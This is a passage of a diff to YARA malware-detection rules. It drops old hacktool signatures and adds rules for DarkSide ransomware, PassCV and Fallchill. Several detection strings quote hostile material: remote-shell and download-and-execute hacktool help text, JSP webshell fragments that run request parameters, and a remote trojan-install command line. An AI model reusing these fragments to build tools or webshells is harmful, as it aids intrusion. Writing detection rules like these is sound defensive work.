+		$e4 = "GvgCfiivmgDrivxglibW" fullword ascii
+		$e5 = "OkvmPilxvhhTlpvm" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "6135d9bc3591ae7bc72d070eadd31755" or 3 of ( $s* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp1
+
+rule SIGNATURE_BASE_Hiddencobra_Fallchill_2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa5128c5-efd5-55dd-880a-2952942e2035"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1999-L2017"
+		id = "c343e8e4-0785-5a47-99c1-98b189f4aaa0"
+		date = "2017-11-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L79-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
-		logic_hash = "7ce1911d7524e9961f907f863b3966817bcad7a571c933dac6a76e1d8a1eeaf8"
-		score = 60
+		logic_hash = "ab421bea251ed3fda4304cd180e5c31f7ae55d3d8b26d6cf5f1cf11bacee9b8d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0a118eb23399000d148186b9079fa59caf4c3faa7e7a8f91533e467ac9b6ff41"
 
 	strings:
-		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
-		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
-		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
-		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
-		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
-		$s15 = "sql=\"select * from scjh\" " fullword ascii
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "yurdkr.dll" fullword ascii
+		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "cb36dcb9909e29a38c387b8a87e7e4ed" or ( 2 of them ) )
 }
-rule SIGNATURE_BASE_QQ_Zip_Folder_QQ
+rule SIGNATURE_BASE_MAL_RANSOM_Darkside_May21_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
+		description = "Detects Darkside Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "30da6292-f670-5b73-985a-3028e20607be"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2019-L2039"
+		id = "e5592065-591e-597b-bebb-f20bc306fe52"
+		date = "2021-05-10"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/020c1740-717a-4191-8917-5819aa25f385/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
-		logic_hash = "d2517c3646b9a3babfa767c5c57b4b576fda471c190ab66e1054c4de359713ad"
-		score = 60
-		quality = 35
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "84de92b0b36e373aa61e314a04597bd0578a04af34c501ae9071e5f4fa27c07a"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce"
 
 	strings:
-		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s4 = "QQ2000b.exe" fullword wide
-		$s5 = "haoq@neusoft.com" fullword ascii
-		$s9 = "QQ2000b.exe" fullword ascii
-		$s10 = "\\qq2000b.exe" ascii
-		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
-		$s17 = "SOFTWARE\\HAOQIANG\\" ascii
+		$op1 = { 85 c9 75 ed ff 75 10 ff b5 d8 fe ff ff ff b5 dc fe ff ff e8 7d fc ff ff ff 8d cc fe ff ff 8b 8d cc fe ff ff }
+		$op2 = { 66 0f 6f 06 66 0f 7f 07 83 c6 10 83 c7 10 49 85 c9 75 ed 5f }
+		$op3 = { 6a 00 ff 15 72 0d 41 00 ab 46 81 fe 80 00 00 00 75 2e 6a ff 6a 01 }
+		$op4 = { 0f b7 0c 5d 88 0f 41 00 03 4c 24 04 89 4c 24 04 83 e1 3f 0f b7 14 4d 88 0f 41 00 03 54 24 08 89 54 24 08 83 e2 3f }
+		$s1 = "http://darksid" ascii
+		$s2 = "[ Welcome to DarkSide ]" ascii
+		$s3 = ".onion/" ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them or all of ( $op* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Unpack_Rar_Folder_Tback
+rule SIGNATURE_BASE_MAL_Ransomware_Win_DARKSIDE_V1_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f672f987-0d43-53df-8338-084907b6da16"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2041-L2069"
+		description = "Detection for early versions of DARKSIDE ransomware samples based on the encryption mode configuration values."
+		author = "FireEye"
+		id = "322a3de5-a7e5-52b9-8648-6019954e92d7"
+		date = "2021-03-22"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L25-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
-		logic_hash = "89f978742ab952b727a9a8dbab0cd88cfc07440e8c4f974dcfa14ed630083761"
-		score = 60
+		hash = "1a700f845849e573ab3148daef1a3b0b"
+		logic_hash = "b3612510bd1f2ca7543e217e97037b02d312bcda2b2df16d9be3216749ea4beb"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
-		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
-		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
-		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
-		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
-		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
-		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
-		$s8 = "Shell                                 -->Get A Shell" fullword ascii
-		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
-		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
-		$s13 = "Online                                -->List All Connected IP" fullword ascii
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
-		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
-		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
-		$s19 = "Reboot                                -->Reboot The System" fullword ascii
-		$s20 = "Password Sniffering Is Not Running" fullword ascii
+		$consts = { 80 3D [4] 01 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] 00 00 04 00 [1-10] 00 00 00 00 [1-30] 80 3D [4] 02 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] FF FF FF FF [1-10] FF FF FF FF [1-30] 03 00 00 00 [1-10] 03 00 00 00 }
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $consts
 }
-rule SIGNATURE_BASE_Sig_238_Cmd_2
+rule SIGNATURE_BASE_MAL_Dropper_Win_Darkside_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fae3c4a-aeeb-5e02-9071-3980a39a19a9"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2071-L2088"
+		description = "Detection for on the binary that was used as the dropper leading to DARKSIDE."
+		author = "FireEye"
+		id = "910a581c-25a4-5d5e-acdc-6d87cbedd3cf"
+		date = "2021-05-11"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L39-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
-		logic_hash = "a794d6b60194a190bd8d549ad00cf90649a52d831fdc7539c68a1f6312609bc2"
-		score = 60
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "131b3666ae444e0de043eafdf7cfd3324b927d18d8ad56d5004ea09b2da5610e"
+		score = 75
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
-		$s1 = "InputStream in = child.getInputStream();" fullword ascii
-		$s2 = "String cmd = request.getParameter(\"" ascii
-		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
-		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+		$CommonDLLs1 = "KERNEL32.dll" fullword
+		$CommonDLLs2 = "USER32.dll" fullword
+		$CommonDLLs3 = "ADVAPI32.dll" fullword
+		$CommonDLLs4 = "ole32.dll" fullword
+		$KeyString1 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 57 69 6E 64 6F 77 73 2E 43 6F 6D 6D 6F 6E 2D 43 6F 6E 74 72 6F 6C 73 22 20 76 65 72 73 69 6F 6E 3D 22 36 2E 30 2E 30 2E 30 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 }
+		$KeyString2 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 56 43 39 30 2E 4D 46 43 22 20 76 65 72 73 69 6F 6E 3D 22 39 2E 30 2E 32 31 30 32 32 2E 38 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 31 66 63 38 62 33 62 39 61 31 65 31 38 65 33 62 22 }
+		$Slashes = { 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C }
 
 	condition:
-		all of them
+		filesize < 2MB and filesize > 500KB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( all of ( $CommonDLLs* ) ) and ( all of ( $KeyString* ) ) and $Slashes
 }
-rule SIGNATURE_BASE_Rangescan
+rule SIGNATURE_BASE_MAL_Backdoor_Win_C3_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "143d9e1e-41e2-579a-beee-30da2cf068f7"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2090-L2107"
+		description = "Detection to identify the Custom Command and Control (C3) binaries."
+		author = "FireEye"
+		id = "60eb022e-6f4e-5c7d-9ddf-b458a593071e"
+		date = "2021-05-11"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
-		logic_hash = "f334a59c2d95505807df642a8d5605b1b7d8b3385a552e8f5a37f344d7a75412"
-		score = 60
-		quality = 35
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "7cdac4b82a7573ae825e5edb48f80be5"
+		logic_hash = "369c54b9426edb449004466d30e1010ecefe8cfbea106306eb8eb90b27610dbf"
+		score = 75
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$s0 = "RangeScan.EXE" fullword wide
-		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
-		$s9 = "Produced by isn0" fullword ascii
-		$s10 = "RangeScan" fullword wide
-		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+		$dropboxAPI = "Dropbox-API-Arg"
+		$knownDLLs1 = "WINHTTP.dll" fullword
+		$knownDLLs2 = "SHLWAPI.dll" fullword
+		$knownDLLs3 = "NETAPI32.dll" fullword
+		$knownDLLs4 = "ODBC32.dll" fullword
+		$tokenString1 = { 5B 78 5D 20 65 72 72 6F 72 20 73 65 74 74 69 6E 67 20 74 6F 6B 65 6E }
+		$tokenString2 = { 5B 78 5D 20 65 72 72 6F 72 20 63 72 65 61 74 69 6E 67 20 54 6F 6B 65 6E }
+		$tokenString3 = { 5B 78 5D 20 65 72 72 6F 72 20 64 75 70 6C 69 63 61 74 69 6E 67 20 74 6F 6B 65 6E }
 
 	condition:
-		3 of them
+		filesize < 5MB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( ( ( all of ( $knownDLLs* ) ) and ( $dropboxAPI or ( 1 of ( $tokenString* ) ) ) ) or ( all of ( $tokenString* ) ) )
 }
-rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Readme
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cee0f8c3-f947-50a5-ae8c-4ce83ef5e433"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2109-L2123"
+		id = "99a26daa-c563-5b23-89b9-965d8ce7229d"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
-		logic_hash = "38d69eee78ff8fa2ad064871481bd1b8a926146922952c7e199d27c809d0c980"
-		score = 60
+		logic_hash = "dfa356b4dff12c3de467c74763fc4d233db9ff5bc3e9ac9f052d331fa47a4ded"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
+		hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
 
 	strings:
-		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
-		$s20 = "XYZCmd V1.0" fullword ascii
+		$x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
+		$x2 = "bin\\oSaberSvc.pdb" ascii
+		$s1 = "cmd.exe /c MD " fullword ascii
+		$s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide
+		$s3 = "CloudRun.exe" fullword wide
+		$s4 = "SaberSvcB.exe" fullword wide
+		$s5 = "SaberSvc.exe" fullword wide
+		$s6 = "SaberSvcW.exe" fullword wide
+		$s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide
+		$s8 = "Internet Connect Failed!" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) and 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Inject
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_Signing_Cert : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb31dc53-f3c1-5f8b-84f9-c231a4e1675b"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2125-L2140"
+		id = "2b2d1313-6454-5e3f-9b58-5b1a26739ba8"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L36-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
-		logic_hash = "6350e11097bc2bb8fb0fbecf6be463aeaf39ad4169d2dd06a57577bf02b515f8"
-		score = 60
+		logic_hash = "ead1de262858960a13b375713183f775bc275fbf4beba4c0839cef2baa5e9f00"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
 
 	strings:
-		$s6 = "Fail To Inject" fullword ascii
-		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
-		$s11 = " Successfully" fullword ascii
+		$s1 = "WOODTALE TECHNOLOGY INC" ascii
+		$s2 = "Flyingbird Technology Limited" ascii
+		$s3 = "Neoact Co., Ltd." ascii
+		$s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
+		$s5 = "EMG Technology Limited" ascii
+		$s6 = "Zemi Interactive Co., Ltd" ascii
+		$s7 = "337 Technology Limited" ascii
+		$s8 = "Runewaker Entertainment0" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Sig_238_Sqlcmd
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0efdfac7-5a89-5251-b583-12b0a58c48ff"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2142-L2161"
+		id = "dd9eb5f6-9faa-584d-b3b5-6dcfdc3f359c"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L59-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
-		logic_hash = "1e41c38da7552d6a25c918547a39ed07ec38a537fd04e2090d1199c4fb0e3b1e"
-		score = 40
+		logic_hash = "f640f1dc60c6714195dcdb9a0bb4fb0c34e0a62673bca00c7f49f7b73c3f9b0a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
+		hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
+		hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
+		hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2"
 
 	strings:
-		$s0 = "Permission denial to EXEC command.:(" ascii
-		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
-		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
-		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
-		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
-		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
-		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+		$x1 = "ncProxyXll" fullword ascii
+		$s1 = "Uniscribe.dll" fullword ascii
+		$s2 = "WS2_32.dll" ascii
+		$s3 = "ProxyDll" fullword ascii
+		$s4 = "JDNSAPI.dll" fullword ascii
+		$s5 = "x64.dat" fullword ascii
+		$s6 = "LSpyb2" fullword ascii
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Aspack_ASPACK
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_Excalibur_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca9a25f9-a94b-5e10-b935-c6e2d38d999c"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2163-L2178"
+		id = "eadad36c-49c8-50e1-8334-813d2e760fe9"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L84-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
-		logic_hash = "1c7abc0a126ee8c8b20e55ad85974067f1a230efc5f95a1a1e732025e39d5bab"
-		score = 60
+		logic_hash = "ffbd971368420460573c4ecc68261088ffacf91ab9ae72405b41393b04aa2b46"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
+		hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
 
 	strings:
-		$s0 = "ASPACK.EXE" fullword wide
-		$s5 = "CLOSEDFOLDER" fullword wide
-		$s10 = "ASPack compressor" fullword wide
+		$x1 = "F:\\Excalibur\\Excalibur\\" ascii
+		$x2 = "Excalibur\\bin\\Shell.pdb" ascii
+		$x3 = "SaberSvc.exe" wide
+		$s1 = "BBB.exe" fullword wide
+		$s2 = "AAA.exe" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of ( $x* ) or all of ( $s* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_Sig_238_2323
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_3 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "445f6a49-51e6-5eb8-ae08-e5989aafb6c4"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2180-L2198"
+		id = "03e5efc0-6076-501f-a600-b3d9008a8711"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L107-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
-		logic_hash = "1278c53f64a0ba7f3f6a728237eac6808b260ad36551923276bfba9b36586870"
-		score = 60
+		logic_hash = "1032f41688e7cb3fe0be33b143c1af43ee705737a70af3b336ba8504ffe169a9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
 
 	strings:
-		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
-		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
-		$s3 = "Failed to execute shell" fullword ascii
-		$s5 = "/h   - Hide Window" fullword ascii
-		$s7 = "Accepted connection from client at %s" fullword ascii
-		$s9 = "Error %d: %s" fullword ascii
+		$x1 = "NXKILL" fullword wide
+		$s1 = "2OLE32.DLL" fullword ascii
+		$s2 = "localspn.dll" fullword wide
+		$s3 = "!This is a Win32 program." fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Jc_ALL_Wineggdropshell_Rar_Folder_Install_2
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_4 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Install.exe"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebfc8e53-328c-5deb-bf9b-e0270f171c68"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2200-L2218"
+		id = "f182064d-3a91-5a61-aa0f-2ce491a60126"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L126-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95866e917f699ee74d4735300568640ea1a05afd"
-		logic_hash = "9c12e8491918a656e37b4ee6c3a42ec970cb6cf101ca5fe3fdfe9eab16526219"
-		score = 60
+		logic_hash = "c445e745ef520438fa7c4ddcae2657b57c80d798640fdd7c85eabf535f158911"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
